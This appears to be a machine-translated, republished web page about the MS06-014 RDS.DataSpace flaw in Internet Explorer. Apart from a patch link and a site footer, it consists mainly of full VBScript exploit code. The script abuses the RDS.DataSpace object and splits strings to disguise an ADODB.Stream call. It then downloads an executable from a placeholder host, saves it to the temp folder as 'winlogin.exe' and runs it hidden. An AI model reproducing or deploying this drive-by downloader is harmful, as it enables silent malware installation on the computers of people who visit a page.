[Latest vulnerability] Using RDS. DataSpace in IE to download and run virus files

Source: Internet
Author: User

Execute the following Code Test whether your machine has a vulnerability: <textarea id="runcode80083"></textarea>
[Ctrl + A select all Note: If you need to introduce external JS, You need to refresh it to execute]

patch download: http://www.microsoft.com/china/technet/Security/bulletin/ms06-014.mspx
the related virus vbs code is as follows: copy Code the code is as follows: on error resume next
DL =" http://www.xxx.com/xxx.exe "
set df = document. createelement ("object")
DF. setattribute "classid", "CLSID: BD96C556-65A3-11D0-983A-00C04FC29E36"
STR = "Microsoft. XMLHTTP "
set X = DF. createobject (STR, "")
A1 = "Ado"
A2 = "DB. "
A3 =" str "
A4 =" EAM "
str1 = A1 & A2 & A3 & A4
str5 = str1
set S = DF. createobject (str5, "")
S. type = 1
str6 = "get"
X. open str6, DL, false
X. send
fname1 = "winlogin.exe"
set f = DF. createobject ("scripting. fileSystemObject "," ")
set TMP = f. getspecialfolder (2)
fname1 = f. buildpath (TMP, fname1)
S. open
S. write X. responsebody
S. savetofile fname1, 2
S. close
set q = DF. createobject ("shell. application "," ")
q. shellExecute fname1, "", "", "open", 0

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.